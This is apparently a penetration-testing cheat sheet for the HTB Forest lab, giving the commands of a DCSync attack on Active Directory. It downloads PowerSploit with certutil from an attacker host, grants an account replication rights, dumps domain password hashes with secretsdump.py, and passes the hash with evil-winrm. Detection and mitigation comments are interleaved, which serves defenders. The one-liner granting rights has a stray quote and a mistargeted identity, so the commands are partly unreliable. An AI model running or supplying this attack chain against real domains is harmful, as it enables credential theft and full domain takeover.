DCSync
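DCSync rights (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object) allow an account to request password hashes from a DC through directory replication - Based on HTB Forest
#Requires PowerUp - Target - assumes that an evil-winrm shell is available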
$ENV:PSModulePath
mkdir C:\Users\%username%\Documents\WindowsPowershell\Modules
cd C:\Users\%username%\Documents\WindowsPowershell\Modules
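#Copy PowerSploit to the modules directory
#Detection: a certutil -urlcache download shows up in process command-line logging and is a common alerting point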
certutil -urlcache -split -f http://10.0.0.1/powersploit-master.zip
#unpack zip
Expand-archive Powersploit-master.zip
cd into folder
import-module .\Powerspolit.psd1
get-module - confirm that PowerSploit is listed
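#Add group membership and DCSync rights
#This path depends on 'Exchange Windows Permissions' being able to modify the ACL of the domain object
#Detection: the membership change is logged as a security-group member-added event (4728/4732/4756 depending on group scope); the ACL change is logged as event 5136 when Directory Service Changes auditing is enabled
#Mitigation: audit who holds replication rights on the domain object and remove the ACL-write permission from groups that do not need it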
Add-DomainGroupMembership -Identity 'Exchange Windows Permissions' -Membership svc-alfresco; $pw = ConvertTo-SecureString 'password' -asPlainText -force; $acc = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pw)' Add-DomainObjectACL -Credential $acc -PrincipalIdentity 'svc-alfresco' -Target-Identity 'htb.loc\Domain Admins' -Rights DCSync
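#Secretsdump.py - Attacker
#Dump password hashes from the DC (uses the directory replication interface, DRSUAPI)
#Detection: event 4662 on the DC listing the replication right GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 / 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 for an account that is not a DC machine account, or replication traffic arriving from an address that is not a DC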
cd to Impacket\Examples
secretsdump.py svc-alfresco:password@10.0.0.1
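#Pass the hash with evil-winrm
#Detection: appears on the target as a 4624 network logon using NTLM; after a confirmed dump, affected account passwords have to be reset, and krbtgt rotated twice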
evil-winrm -u administrator -p passwordhash -i 10.0.0.1